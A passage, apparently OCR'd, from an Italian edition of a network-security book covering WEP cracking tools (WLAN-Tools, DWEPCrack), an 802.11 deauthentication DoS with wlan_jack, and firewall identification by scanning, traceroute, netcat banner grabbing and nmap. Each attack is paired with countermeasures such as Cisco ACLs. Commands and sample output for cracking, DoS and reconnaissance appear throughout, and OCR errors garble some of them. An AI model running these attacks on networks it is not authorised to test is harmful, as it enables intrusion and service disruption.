WEP, quale WEP-Plus, è opportuno implementarlo. Un ultimo consiglio: modificate il 
più spesso possibile la vostra chiave WEP. Rammentate che chiunque si trovi entro il 
raggio di copertura ha accesso ai dati trasmessi sulla vostra rete 802.11. Pertanto, l'attivi- 
tà di protezione di tali dati dovrà essere svolta costantemente e su diversi livelli. 
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® WLAN-T cols 


Diffusione: 10 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 9 


WLAN-Tools (o, come dovrebbe essere chiamato, “il Padrino del wireless cracking”) è 
stato creato da Tim Newsham (http://www. lava.net/-newsham/wlan/). È il caposti- 
pite degli attacchi codificati destinati a sfruttare i punti deboli contenuti nell’algoritmo 
WEP. Progettato per funzionare in ambiente Linux, WLAN-Tools, se opportunamente 
modificato, può funzionare anche su molte versioni di UNIX, tra cui BSD e Solaris. Il 
tool comprende programmi per la cattura di pacchetti 802.11 e il cracking di pacchetti 
con crittografia WEP. Questo toolkit è eccellente per chi desideri studiare il codice 
che determina la vulnerabilità; inoltre esso contiene patch per i driver degli sniffer. 
Abbiamo ritenuto necessario informarvi dell’esistenza di questo tool poiché esso è 
stato il capostipite di questo tipo di attacco; tuttavia, vista la sua interfaccia e le carat- 
teristiche spartane, riteniamo che sia attualmente superato. Consigliamo pertanto di 
utilizzare al suo posto DWEPUtils di DachbOden Labs, se possibile, o AirSnort. 


Contromisure a WLAN-Tools 


Per sapere come attenuare i rischi cui è soggetta la vostra WLAN, attenetevi ai con- 
sigli relativi alle contromisure per AirSnort, forniti nella prima parte del capitolo. 


® DWEPCrack 


Diffusione: 5) 
Semplicità: 

Impatto: 9 
Fattore di rischio: 6 


DWEPCrack, scritto da DachbOden Labs (http://ww.dachbOden.com/projects/ 
dweputils.html), è un tool utilizzato specificamente per effettuare il cracking di pac- 
chetti con crittografia WEP tramite la piattaforma BSD. DachbOden Labs, situata nella 
California del Sud, si vanta di essere un'azienda dedita alla ricerca sui problemi della 
sicurezza e sulle reti wireless. Il toolkit DachbOden contiene funzioni specifiche, che 
possono essere utilizzate individualmente o combinate in uno script in modo da farle 
interagire. È di gran lunga il toolkit più completo tra quelli che consentono di sfruttare 
i numerosi punti deboli contenuti nell’algoritmo WEP; inoltre, consente a un aggres- 
sore di sfruttare altri punti deboli basati sull’infrastruttura, quali le liste di controllo de- 
gli accessi basate su MAC, con un algoritmo a forza bruta che cerca di “forzare” lo 
spazio delle chiavi degli indirizzi MAC allo scopo di stabilire un'associazione non au- 
torizzata a un AP. DWEPCrack consente di specificare una lista di dizionari da utiliz- 
zare per un attacco di tipo forza bruta alla chiave WEP, nonché di sottoporre a un at- 
tacco basato sulla forza bruta l’intero spazio delle chiavi finché non viene trovata la 
chiave opportuna. Tenete presente che se l’AP utilizza una chiave WEP a 128 bit, è 
del tutto possibile che essa venga modificata prima che la troviate. Per informazioni 
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dettagliate sulle modalità di esecuzione del cracking o sulla crittografia, consultate il 
paragrafo dedicato al WEP, o effettuate ricerche su Google.com. 

DWEPCrack effettua il parsing del log, individuando il numero di pacchetti, gli IV 
univoci e le corrispondenti chiavi di cifratura utilizzate per effettuare lo XOR del 
payload dei pacchetti. Quando esso stabilisce che sono soddisfatti gli opportuni 
prerequisiti per tentare un attacco WEP, cerca di acquisire con un metodo a forza 
bruta la chiave WEP. Ecco cosa potete aspettarvi di vedere quando eseguite DWE- 
PCrack dalla riga di comando fornendogli un log di pacchetti con crittografia WEP: 


cloud@gabriel -$ dwepcrack -w -/sniffed wlan_log 


* dwepcrack v0.4 by hikari <hikari@dachb@den.com> * 
* Copyright (c) Dachb@den Labs 2002 [ht*p://dachb@Oden.com] * 


reading in captured ivs, snap headers, and samples... done 
total packets: 723092 


calculating ksa probabilities... 
0: 88/654 keys (1!) 

2850/890900 keys (!) 
5079/187230 keys (!) 
5428/130824 keys (1!) 
14002/420103 keys (!) 


PWM 


(!) insufficient ivs, must have > 60 for each key (1!) 
(!) probability of success for each key with (!) < 0.5 (!) 


warming up the grinder... 
packet length: 48 
init ventor: 58:f4:24 
default tx key: 0 


Progresse siena 


wep keys successfully cracked! 
Di XKXIXXIKXXXIXX * 
done. 


cloud@gabriel -$ 


© Contromisure a DWEPCrack 


Per sapere come limitare alcuni dei rischi connessi alla vostra WLAN, attenetevi ai 
consigli relativi alle contromisure per AirSnort, forniti in precedenza. 


Attacchi DoS 


Le reti wireless 802.11 possono essere sottoposte ad attacchi Do$ (Denial of Service) 
effettuati utilizzando lo stesso protocollo 802.11 e mediante interferenze in interval- 
lo di frequenze della banda S ISM. L'intervallo ISM (Industrial Scientific and Medi- 
cal) è stato riservato dall’FCC all’utilizzo mediante dispositivi per i quali non è pre- 
vista una licenza. Questo significa che se desiderate creare un sistema RF che utiliz- 
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zi una banda ISM non dovrete pagare all’FCC alcuna tassa di concessione per la li- 
cenza (tuttavia dovrete registrare il dispositivo). Gli standard 802.11, 1lb e 11g si 
servono della banda ISM a 2,4-2,5 GHz, attualmente piuttosto affollata. In questa 
banda operano i telefoni cordless, le ricetrasmittenti “Baby Control”, le fotocamere 
X10 e numerosi altri dispositivi, che possono provocare la perdita di pacchetti o ad- 
dirittura l'interruzione del servizio nelle reti 802.11. 

C'è un altro problema insito nell’802.11: i frame di gestione che controllano le ope- 
razioni relative alla connessione al client sono completati senza autenticazione e 
possono essere contraffatti facilmente. Sostanzialmente, un aggressore può contraf- 
fare un pacchetto in modo che esso sembri a tutti i client presenti sulla rete genera- 
to nel punto di accesso. Questo pacchetto segnala a tutti i client di disconnettersi. 
Purtroppo non c'è alcun modo per impedire a un aggressore della vostra rete di 
eseguire questa operazione. Il tool wlan_jack, che consente di effettuare questo 
tipo di attacco, è incluso nella suite Air-Jack. Per utilizzarlo, occorre specificare il 
punto di accesso MAC, il canale e l’indirizzo MAC a cui inviare l’attacco. La destina- 
zione di default è costituita dall'indirizzo di broadcast, il che significa che verrà in- 
viato a tutti i client. Tuttavia è anche possibile sopprimere selettivamente un’unica 
connessione, specificando solo l’indirizzo MAC della stazione corrispondente. 
Nell'esempio seguente, il MAC per il quale intendiamo annullare l'autenticazione 
(escludendolo in tal modo dalla rete) è 00:09:E8:B4:CB:E8, metre quello del pun- 
to di accesso è 00:07:0E:B9:94:32: 


[cloud@gabriel tools]# ./wlan_jack -b 00:07:0E:B9:94:32 -v 00:09:E8: 
B4:CB:E8 -c 6 -i ajQ 
Wlan-Jack: 802.11 DOS utility 


Jacking Wlan... 


Wlan_jack agisce continuamente, finché non viene individuato, per cui può esclu- 
dere la stazione dalla rete a tempo indefinito. 


Panoramica sull’802.1x 


Gli standard IEEE 802.11a e 802.11b sono stati aspramente criticati dai mass media, 
dal settore dei prodotti commerciali e dalla maggior parte degli addetti ai lavori del 
settore della sicurezza informatica per la loro mancanza di adeguate specifiche per 
la sicurezza basata sul protocollo. I fornitori hanno compiuto diversi sforzi per mi- 
gliorare la sicurezza dell’802.11 e per aggiornare il firmware, e addirittura alcuni for- 
nitori stanno attualmente considerando la possibilità di passare a un’infrastruttura 
basata su Bluetooth per le loro soluzioni wireless. Nella speranza di riuscire a risol- 
vere i problemi di sicurezza e ridurre i rischi connessi con l’attuale infrastruttura 
802.11, IEEE, in coordinamento con partner commerciali e del mondo accademico, 
ha messo a punto il protocollo 802.1x. 

Gli obiettivi della progettazione di alto livello dell’802.1x sono semplici. La specifica 
prevede un’infrastruttura espandibile che consente e assicura l'aggiunta continua di 
ulteriori client e AP con uno sforzo tecnologico minimo, Oltre agli obiettivi riguar- 
danti l’infrastruttura, sono stati affrontati problemi di sicurezza, inclusa l’autentica- 
zione e la crittografia. È stato rilevato che sarebbe opportuno implementare un 
qualche meccanismo per la crittografia continua dei nodi effettuata mediante diver- 
se chiavi segrete, superando i limiti del WEP. Infine, sarebbe opportuno affrontare il 
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problema dell'autenticazione in modalità duale. Attualmente, l'autenticazione dei 
nodi avviene tramite un handshake client-to-server, anziché uno schema client-to- 
server, server-to-client. 
In genere, le proposte di integrazione dei framework 802.1x e 802.11 richiedono la 
soluzione di due problemi principali. L'attuale specifica 802.1x non assicura una 
protezione contro gli attacchi Man-In-The-Middle e non affronta il problema degli 
attacchi di dirottamento di sessioni. Gli attacchi Man-In-The-Middle puntano al rein- 
dirizzamento del traffico da un nodo client all’AP, consentendo pertanto al dirotta- 
tore di visualizzare tutti i dati che vengono trasmessi a tale nodo dall’AP e da tale 
nodo all’AP. Questo tipo di attacco ha successo a causa della mancata autenticazio- 
ne effettuata dall’AP nei confronti del client, che induce a un'eccessiva fiducia nel- 
l'autenticazione client-server. Per esempio, nella specifica 802.1x non c'è attualmen- 
te alcun metodo che dia al client la certezza di effettuare l'autenticazione sull’AP op- 
portuno. L'altro tipo di attacco, il dirottamento di sessioni, ha successo a causa della 
mancanza di confidenzialità dei messaggi e di autenticazione a basso livello. Un ag- 
gressore può disassociare un utente legittimo e poi assumerne surrettiziamente 
l’identità per proseguire la sessione di comunicazione, senza che l’AP rilevi questo 
trucco. Alcuni tool come Air-Jack e Libradiate possono risultare utili per eseguire at- 
tacchi di questo tipo. 
Sfortunatamente, non esiste una soluzione semplice a questo problema; esso non 
può essere risolto aggiungendo semplicemente un altro schema di autenticazione, 
né creando un metodo sicuro di schedulazione continua delle chiavi. È necessario 
che coloro che ne hanno l’autorità si rimettano a tavolino e creino un protocollo so- 
lido e sicuro di comunicazione sulle reti, in particolare quelle wireless, senza peral- 
tro rinunciare alle funzionalità desiderate. 

I siti Web elencati di seguito mettono a disposizione trattazioni scientifiche e infor- 

mazioni dettagliate relative ai temi della sicurezza in ambiente 802.1x e 802.1x: 

e www.cs.umd.edu/-waa/1x.pdf. Pubblicazione dell'University of Maryland 
relativa alle ricerche effettuate in merito all'attuale standard del protocollo 
IEEE 802.1x; 

e http://grouper.ieee.org/groups/802/11/index.html. Specifica del pro- 
tocollo di comunicazione IEEE 802.11; 


e http://ww.ieee802.0rg/1/pages/802.1x.html. Specifica del protocol- 
lo di comunicazione IEEE 802.1x. 


Capitolo 1 | 
Firewall 


Fin dalla pubblicazione dello storico libro di Cheswick e Bellovin sulla realizzazio- 
ne di un sistema di firewall e l’identificazione di uno scaltro hacker di nome Ber- 
ferd, la sola idea di disporre un server Web su Internet senza accompagnarlo con 
un firewall è stata considerata suicida. Altrettanto suicida si è rivelata la frequente 
decisione di far ricadere sulle spalle del progettista della rete la gestione del 
firewall: queste persone possono essere ferratissime sulle implicazioni tecniche di 
un firewall, ma non sono certamente ferrate in materia di sicurezza, né riescono a 
immedesimarsi nella mentalità o nei metodi di un hacker. Di conseguenza, il mon- 
do è pieno di firewall mal configurati, che consentono agli intrusi di tuffarsi in una 
rete e provocare più di un grattacapo. 


Scenario attuale 


Il mercato offre principalmente due tipi di firewall: proxy applicativi (application 
proxy) e gateway per il filtraggio dei pacchetti (filtering gateway). Mentre i primi 
vengono unanimemente considerati più sicuri dei secondi, la loro natura restrittiva 
e le pesanti ricadute a livello di prestazioni ne hanno limitato l’adozione al traffico 
in uscita dall'azienda piuttosto che in ingresso su un server Web o DMZ. I gateway 
per il filtraggio dei pacchetti, o le versioni più sofisticate per il filtraggio di stato, 
sono invece diffusi in molte delle più grandi organizzazioni, dove sono più strin- 
genti i requisiti in termini di prestazioni. 

Fin dall'introduzione del primo firewall, questi dispositivi hanno difeso innumere- 
voli reti da occhi indiscreti e intrusioni vandaliche, ma siamo ancora lontani 
dall'avere l'antidoto perfetto. Ogni anno si scoprono nuovi punti vulnerabili in qua- 
si tutti i firewall presenti sul mercato. Ma quel che è peggio, la maggior parte di essi 
viene configurata in modo non corretto, oppure non viene controllata 0 sottoposta 
a manutenzione, facendone dei veri e propri fermaporta elettronici che tengono la 
porta ben spalancata. 

Sia ben chiaro, un firewall ben congegnato, configurato e tenuto sotto controllo è 
praticamente impenetrabile. In effetti, anche gli hacker più preparati se ne rendono 
conto e preferiscono aggirare queste protezioni sfruttando eventuali relazioni di fi- 
ducia, o cercando punti vulnerabili negli anelli più deboli della catena, o evitarle 
del tutto, attaccando attraverso un account a connessione telefonica. In poche paro- 
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le, la maggior parte degli hacker farà il possibile per evitare un firewall robusto: 
l’obiettivo è quindi rinforzarli il più possibile. 

Essendo noi stessi amministratori di firewall, abbiamo imparato quanto sia impor- 
tante conoscere il nemico: riuscire a prevedere i primi passi che un hacker compie 
nel tentativo di superare il nostro firewall ci aiuterà enormemente nel riconoscere e 
contrastare un simile attacco. In questo capitolo illustreremo le principali tecniche 
attualmente utilizzate per riconoscere ed enumerare i firewall, insieme ad alcuni dei 
metodi con cui un hacker potrebbe tentare di aggirarli. Per ogni tecnica, spieghere- 
mo come intercettare e prevenire gli attacchi. 


Identificazione dei firewall 


Qualsiasi firewall emette un “odore” elettronico inconfondibile. In altre parole, per la 
quasi totalità dei firewall presenti sulla rete è sufficiente qualche scansione sulle porte e 
un po’ di firewalking e di cattura dei banner, per ricavare con precisione il tipo, la ver- 
sione e il comportamento seguito da quasi tutti i firewall in rete. Perché è così importan- 
te questa identificazione? Perché una volta circoscritti se ne possono esaminare i punti 
deboli e sfruttarli. 


® Scansione diretta: la tecnica “rumorosa” 


Diffusione: 10 
Semplicità: 8 
Impatto: 2 
Fattore dl rischio: F; 


Il modo più semplice per trovare i firewall è effettuare la scansione di specifiche porte 
predefinite (come spiegato nel Capitolo 2). Alcuni dei firewall presenti sul mercato 
possono essere identificati semplicemente dal risultato della scansione delle porte: ba- 
sta sapere dove cercare. Per esempio, il Firewall-1 di Check Point ascolta sulle porte 
TCP 256, 257, 258 e 259 (mentre NG di Check Point è in ascolto sulle porte TCP 18210, 
18211, 18186, 18190, 18191, 18192) mentre il Proxy Server di Microsoft solitamente 
ascolta sulle porte TCP 1080 e 1745. Sapendo questo, cercare questi tipi di firewall con 
un programma di scansione delle porte come ScalLine di Foundstone diventa banale: 


sl -pvh -t 23,80 68.4.190.1-254 


n L'opzione --p disattiva l'utilizzo di ping ICMP prima della scansione: è im- 
Ro portante, perché la maggior parte dei firewall non risponde alle richieste 
ICMP di tipo echo, 


L'hacker sprovveduto o sicuro di sé userà questo strumento per effettuare una scan- 
sione ad ampio spettro della vostra rete, alla ricerca di firewall ed eventuali falle 
nella protezione perimetrale della rete. Gli hacker più pericolosi, invece, lo faranno 
nel modo più silenzioso possibile. Esistono diverse tecniche che permettono a un 
intruso di passare inosservato, come effettuare i ping e considerare le porte (-z) e 
gli indirizzi di destinazione (-z) e le porte d'origine (-g) in ordine casuale anziché 
in sequenza (il che significa che un hacker può distribuire la scansione della rete tra 
diversi computer collegati a Internet). 
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Se credete che il vostro sistema IDS Untrusion Detection System) sia in grado di ri- 
conoscere questi hacker più pericolosi, vi invitiamo a ripensarci: la maggior parte 
degli IDS, nella loro configurazione standard, è in grado di riconoscere solo i tenta- 
tivi di scansione meno discreti e prevedibili. A meno che non interveniate personal- 
mente per aumentare la sensibilità del vostro IDS e affinare la sensibilità del ricono- 
scimento, la maggior parte degli attacchi passerà del tutto inosservata. Per effettuare 
una scansione completamente casuale sono sufficienti semplici script Perl, simili a 
quelli proposti sul sito Web http://ww.hackingexposed. com. 


Contromisura alla scansione diretta 


Le contromisure per la scansione dei firewall riprendono per molti versi quelle già 
esposte nel Capitolo 2, dedicato appunto alla scansione. Potete scegliere tra bloccare 
questo tipo di scansioni sui router di confine o adottare qualche strumento per l’inter- 
cettazione degli intrusi (ne esistono sia freeware sia commerciali). In ogni caso, tutta- 
via, la maggior parte degli IDS non rileverà la scansione di singole porte; dovrete quin- 
di regolarne la sensibilità prima che il riconoscimento sia effettivamente affidabile, 


Intercettazione 


Per riuscire a riconoscere le scansioni delle porte che utilizzano sequenze casuali, è 
necessario prima adattare le impronte utilizzate per il riconoscimento. Per maggiori 
dettagli, fate riferimento alla documentazione del produttore del vostro IDS. 

Se utilizzate Firewall-1 per UNIX, potete servirvi del programma di Lance Spitzner 
per l’intercettazione delle scansioni sulle porte con Firewall-1 (http://ww.enter- 
act.com/-lspitz/intrusion.html). Come già detto nel Capitolo 2, lo script 
alert.sh è in grado di configurare Check Point in modo da riconoscere e control- 
lare le scansioni delle porte, emettendo eventualmente un avviso utente personaliz- 
zabile (User Defined Alert). 


Prevenzione 


Per impedire le scansioni sulle porte del firewall da Internet è necessario bloccarle 
sui router posti prima dei firewall; se questi dispositivi sono gestiti dal vostro ISP, 
dovrete discutere insieme le modalità di blocco, se invece siete voi stessi a gestirli 
potete utilizzare le seguenti ACL Cisco, per bloccare esplicitamente le scansioni: 


access-list 101 deny tcp any any eq 256 log ! Block Firewall-1 scans 
access-list 101 deny tcp any any eq 257 log ! Block Firewall-1 scans 
access-list 101 deny tcp any any eq 258 log ! Block Firewall-1 scans 
access-list 101 deny tcp any any eq 259 log ! Block Firewall-1 scans 
access-list 101 deny tcp any any eq 1080 log ! Block Socks scans 
access-list 101 deny tcp any any eq 1745 log ! Block Winsock scans 


= Se decidete di bloccare le porte di Check Point (256-259) sui router esterni, 
ng ricordate che non potrete più gestire il firewall da Internet. 


Il vostro amministratore Cisco non dovrebbe avere problemi a definire que- 
ste regole per il firewall: è sufficiente entrare in modalità enable e digitare le 
righe una alla volta, quindi uscire dalla modalità enable e digitare write 
per riportare nel file di configurazione. 
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Inoltre, su tutti i router dovrebbe essere definita una regola di “pulizia” (se già non re- 
spinge i pacchetti per impostazione predefinita) che si comporti come specificato nelle 
operazioni di rifiuto. Una tipica regola di tipo “vieta tutto” si presenterà come segue: 


access-list 101 deny ip any any log ! Deny and log any packet that got 
through our ACLs above 


i requisiti di installazione prima di adottare qualsiasi rimedio. 


® traceroute 


Come per ogni altra contromisura, verificate con cura la documentazione e 


Diffusione: 10 
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Un metodo più ingegnoso e discreto per trovare i firewall su una rete prevede l’im- 
piego di traceroute, nella versione per UNIX o Windows (tracert.exe), con 
l’identificazione di ogni salto sul percorso e l’azzardo di qualche deduzione. La ver- 
sione di traceroute per Linux prevede un'opzione -I, che esegue la mappatura in- 
viando pacchetti ICMP, al posto dei pacchetti UDP utilizzati di default: 


[sm]$ traceroute -I 192.168.51.100 
traceroute to 192.168.51.101 (192.168.51.100), 30 hops max, 40 byte 
packets 

1 attack-gw (192,168.50,21) 5.801 ms 5.105 ms 5.445 ms 

2 gwi.smallisp.net (192.168.51.1) 

3 gw2.smallisp.net (192.168.52.2) 


13 hssi.bigisp.net (10.55.201.2) 
14 seriali.bigisp.net (10.55.202.1) 
15 192.168.51.101 (192.168.51.100) 


Ci sono buone probabilità che il sistema (10.55.202.1) che precede la destinazione 
(192.168.51.100) sia il firewall, ma non possiamo ancora esserne certi. Sarà quindi 
necessario qualche approfondimento. 

L'esempio precedente va benissimo se i router che vi separano dal server target ri- 
spondono ai pacchetti con TTL scaduto. Purtroppo, alcuni router e firewall sono 
impostati in modo da non restituire pacchetti ICMP con TTL scaduto (in risposta a 
pacchetti sia ICMP sia UDP): in questo caso la deduzione è meno scientifica. La sola 
possibilità è eseguire traceroute e osservare l’ultimo passaggio per il quale si rice- 
ve risposta: potrebbe trattarsi o di un firewall vero e proprio, o del primo router sul 
percorso che inizia a bloccare i pacchetti con TTL scaduto, Per esempio, in questo 
caso ICMP viene bloccato prima di arrivare a destinazione e non si ricevono rispo- 
ste da router oltre client -gw.smallisp.net: 


1 stoneface (192.168.10.33) 12.640 ms 8.367 ms 

2 gwi.localisp.net (172.31.10.1) 214.582 ms 197.992 ms 
3 gw2.localisp.net (172.31.10.2) 206.627 ms 38.931 ms 
4 dsi.localisp.net (172.31.12.254) 47.167 ms 52.640 ms 
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14 ATM6.LAX2.BIGISP.NET (10.50.2.1) 250.030 ms 391.716 ms 
15 ATM7.SDG.BIGISP.NET (10.50.2.5) 234.668 ms 384.525 ms 
16 client-gw.smallisp.net (10.50.3.250) 244.065 ms IX * * 
#7 * & * 

18 * x * 


Contromisura a traceroute 


Il rimedio per evitare le perdite di informazioni attraverso traceroute è impedire al 
maggior numero possibile di firewall e router di rispondere a pacchetti con TTL sca- 
duto: purtroppo questo non è sempre possibile, perché molti dei vostri router sono 
probabilmente controllati dal vostro ISP, ma possono essere effettuati alcuni tentati- 
vi per indurre il vostro ISP a intervenire. 


Intercettazione 

Per intercettare i tentativi di traceroute standard sul perimetro della rete è necessa- 
rio monitorare l’arrivo di pacchetti ICMP e UDP con TTL pari a 1. 

Prevenzione 


Per impedire il passaggio di tentativi di traceroute attraverso i confini della vostra 
rete, potete configurare i router in modo che non rispondano con messaggi TTL 
EXPIRED all’arrivo di pacchetti con TTL pari a 0 o 1. La seguente ACL può essere 
utilizzata con i router Cisco: 


access-list 101 deny ip any any 11 0! ttl-exceeded 


L'ideale sarebbe bloccare sui router esterni tutto il traffico UDP non strettamente ne- 
cessario. 


C) Cattura dei banner 
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La scansione delle porte dei firewall può aiutare a localizzarli, ma la maggior parte 
di essi non ascolta su porte predefinite, come Check Point e il prodotto Microsoft, 
quindi è necessario arrivare al riconoscimento per deduzione. Ricorderete dal Capi- 
tolo 3 che per scoprire i nomi e le versioni delle applicazioni in esecuzione è possi- 
bile provare a collegarsi ai servizi attivi e leggere i relativi banner (le intestazioni re- 
stituite). Per riconoscere un firewall si può procedere allo stesso modo. Molti si pre- 
sentano da soli, quando ci si collega (ovviamente, per trovare una porta alla quale 
connettervi dovrete effettuare una scansione delle porte, argomento trattato nel Ca- 
pitolo 2): molti firewall proxy si dichiarano tali e alcuni comunicano il tipo e la ver- 
sione. Per esempio, collegandoci con netcat sulla porta 21 (FTP) del presunto 
firewall dell'esempio precedente, otteniamo indicazioni interessanti: 


C:\>nc -v -n 192.,168.51.129 21 
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(UNKNOWN) [192.168.51.129] 21 (?) open 
220 Secure Gateway FTP server ready. 


Il messaggio “Secure Gateway FTP server ready" è un forte indizio della presenza di 
una vecchia macchina Eagle Raptor. Un secondo collegamento alla porta 23 (telnet) 
conferma i nostri sospetti: 


C:\>nc -v -n 192.168.51.129 23 
(UNKNOWN) [192.168.51.129] 23 (?) open 
Eagle Secure Gateway. 

Hostname: 


Se alla fine non siete ancora convinti che si tratti di un firewall, potete collegarvi 
con netcat alla porta 25 (SMTP), ottenendo una risposta inequivocabile: 


C:\>nc -v -n 192.168.51.129 25 

(UNKNOWN) [192.168.51.129] 25 (?) open 

421 fw3.example.com Sorry, the firewall does not provide mail service to 
you. 


Come potete notare da questi esempi, le informazioni contenute nei banner posso- 
no rivelarsi preziose per gli hacker che intendono intercettare i firewall. Sulla base 
di queste informazioni, essi possono tentare di sfruttare punti deboli noti o errori di 
configurazione comuni. 


© 
. Contromisure alla cattura dei banner 


La soluzione a questo tipo di vulnerabilità è eliminare le porte aperte sul firewall 
(operazione generalmente impossibile) o limitare il più possibile Ie informazioni 
esposte nei banner. Se proprio dovete lasciare aperta una porta sull’interfaccia ver- 
so l'esterno del firewall, potete modificare il banner affinché presenti all'ospite in- 
desiderato un warning che segnali che il sistema provvederà a registrare ogni tenta- 
tivo di connessione. Il modo specifico per modificare i banner predefiniti dipende 
ovviamente dal tipo di firewall che utilizzate, quindi vi consigliamo di contattare il 
produttore. 


Prevenzione 


Per impedire che un hacker riesca a ottenere troppe informazioni sui vostri firewall 
esaminando i banner da essi esposti, il più delle volte è sufficiente modificare i file 
di configurazione dei banner, con modalità dipendenti dal produttore. Sui firewall 
Eagle Raptor, per sostituire i banner per FTP e telnet è sufficiente modificare i file 
“message-of-the-day”: ftp.motd e telnet.motd. 


Tecniche avanzate di identificazione dei firewall 


Se la scansione diretta dei firewall, il tracciamento del percorso e la cattura dei ban- 
ner non hanno dato i risultati sperati, l’hacker passerà alla seconda fase dell’enume- 
razione dei firewall. La presenza di firewall e le relative ACL possono essere dedotte 
sondando gli obiettivi e prendendo nota dei percorsi affrontati (o non affrontati) 
per arrivare a destinazione. 
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‘} Deduzione semplice con nmap 
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nmap è un eccellente strumento per ottenere informazioni sui firewall e noi lo utiliz- 
ziamo molto spesso: non si limita a indicare quali porte siano aperte o chiuse, ma 
anche quali sono bloccate. La quantità (o la mancanza) di informazioni ottenute 
con la scansione delle porte può rivelare molto sulla configurazione del firewall. 

La presenza di una porta filtrata in nmap può segnalare tre eventualità. 


e Nonèstato ricevuto un pacchetto SYN/ACK. 
e Nonèstato ricevuto un pacchetto RST/ACK. 


e Èstato ricevuto un messaggio ICMP di tipo 3 (destinazione non raggiungibi- 
le) contenente il codice 13 (Comunicazione inibita dall’amministratore, 
[RFC1812)). 


nmap sintetizza ed elabora queste tre situazioni, identificando la porta come “filte- 
red”. Per esempio, durante la scansione di ww.example.com, riceviamo due pac- 
chetti ICMP che indicano che il firewall blocca gli accessi alle porte 23 e 111 prove- 
nienti dal nostro sistema: 


Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) 
Initiating TCP connect() scan against (192.168.51.100) 

Adding TCP port 53 (state Open). 

Adding TCP port 111 (state Firewalled). 

Adding TCP port 80 (state Open). 

Adding TCP port 23 (state Firewalled). 

Interesting ports on (192.168.51.100): 


Port State Protocol Service 
23 filtered tcp telnet 
53 open top domain 
80 open top http 

111 filtered tep sunrpe 


Lo stato “Firewalled”, in questo output dettagliato, rappresenta la ricezione di un 
pacchetto ICMP di tipo 3 e codice 13 (Admin Prohibited Filter), come mostrato 
nell’output di tepdump: 


23:14:01.229743 10.55.2.1 > 172.29,11.207: icmp: host 172.32.12.4 
Unreachable - admin prohibited filter 
23:14:01.979743 10.55.2.1 > 172.29.11.207: icmp: host 172.32.12.4 
Unreachable - admin prohibited filter 


Come riesce nmap ad associare questi pacchetti con quelli originali, senza confon- 
derli nel mare di pacchetti che sfrecciano sulla rete? In realtà il pacchetto ICMP resti- 
tuito alla macchina che effettua la scansione contiene tutti i dati necessari per capire 
cosa stia succedendo: la porta bloccata è il byte che si trova nell'intestazione ICMP, 
nella posizione 0x41, mentre l’indirizzo del firewall che opera il filtro si trova nella 
porzione IP del pacchetto, alla posizione 0x1b (4 byte). 
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Infine, nmap classifica come “unfiltered” (non filtrate) le porte per cui riceve un pacchet- 
to RST/ACK in risposta alla scansione. In corrispondenza dello stato “unfiltered”, pos- 
siamo concludere che o la scansione riesce a superare il firewall e il sistema target di- 
chiara di non ascoltare su quella porta, o il firewall risponde, sostituendosi al target e 
contraffacendone l'indirizzo IP nella risposta RST/ACK. Per esempio, la scansione di un 
sistema locale identifica due porte non filtrate perché riceve due pacchetti RST/ACK 
dallo stesso host. Questa situazione si può verificare anche in presenza di firewall come 
Check Point (se è attiva la regola REJECT), se questi rispondono al posto del target con 
un pacchetto RST/ACK in cui viene contraffatto l'indirizzo dell'obiettivo originario: 


[root]# nmap -sS -p1-300 172.18.20.55 
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, ww.insecure.org/nmap/) 


Interesting ports on (172.18.20.55): 
(Not showing ports in state: filtered) 


Port State Protocol Service 

A unfiltered tcp echo 

53 unfiltered tcp domain 

256 open tcp rap 

257 open tcp set 

258 open tcp yak-chat 

Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds 


L'output di tepdump associato a questa sequenza riporta i pacchetti RST/ACK ricevuti: 


21:26:22.742482 172.18.20.55.258 > 172.29.11.207.39667: S 
415920470:1415920470(0) ack 3963453111 win 9112 <mss 536> (DF) 
(ttl 254, id 50438) 

21:26:23.282482 172.18.20.55.53 > 172.29.11.207.39667: 

R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50439) 
21:26:24.362482 172.18.20.55.257 > 172.29.11.207.39667: 

S 1416174328:1416174328(0) ack 3963453111 win 9112 <mss 536> 
(DF) (ttl 254, id 50440) 

21:26:26.282482 172,18.20.55.7 > 172.29.11.207.39667: 

R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50441) 


° Contromisure alla deduzione semplice con nmap 
Intercettazione 


I meccanismi di intercettazione delle scansioni con nmap sono gli stessi descritti nel 
Capitolo 2. In particolare, consigliamo di personalizzarli in modo da ricavare soltan- 
to le scansioni che possono causare il riconoscimento dei vostri firewall. 


Prevenzione 


Per impedire agli hacker di enumerare le ACL di router e firewall applicando la tec- 
nica “admin prohibited filter”, è possibile disattivare le risposte del router con pac- 
chetti ICMP di tipo 13. Nei sistemi Cisco è sufficiente impedire al dispositivo di ri- 
spondere ai messaggi “IP non raggiungibile”: 


no ip unreachables 
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C) Identificazione delle porte 


Diffusione: bi 
Semplicità: 6 
Impatto: 7 
Fattore di rischio: 6 


Alcuni firewall possiedono un'impronta unica, una serie di numeri che li distingue 
da altri sistemi analoghi. Per esempio, Check Point mostra una serie di numeri 
quando ci si connette alla porta TCP 257 di gestione SNMP. Se da un lato la sempli- 
ce presenza delle porte 256-259 su un sistema segnala con sufficiente certezza un 
Firewall-1 di Check Point, il seguente test può confermarlo: 


[root]# ne -v -n 192.168.51.1 257 (UNKNOWN) [192,168.51.1] 257 (?) open 
30000003 


[root]# nc -v -n 172.29.11.191 257 


(UNKNOWN) [172.29.11.191] 257 (?) open 
31000000 


Contromisure per l’identificazione delle porte 
Prevenzione 


Per impedire le connessioni alla porta TCP 257 (o qualsiasi altra porta di Check 
Point) è possibile bloccarla sui router esterni. Una semplice ACL Cisco come la se- 
guente può respingere esplicitamente il tentativo di un hacker: 


access-list 101 deny tcp any any eq 257 log ! Block Firewall-1 scans 


Scansione attraverso i firewall 


Tranquilli, non abbiamo intenzione di mettere nelle mani di qualche ragazzino tec- 
niche magiche per rendere inefficaci i vostri firewall. Piuttosto, vedremo alcune tec- 
niche per girare intorno ai firewall, raccogliendo informazioni fondamentali sui di- 
versi percorsi che li aggirano o attraversano. 


Trasmissione di pacchetti di dati raw 


Diffusione: 3 
Semplicità: 4 
Impatto: 8 
Fattore di rischio: 5 


hping, un programma di Salvatore Sanfilippo (http://www. hping.org), invia pac- 
chetti TCP (in modalità predefinita) a una porta di destinazione e fornisce un report 
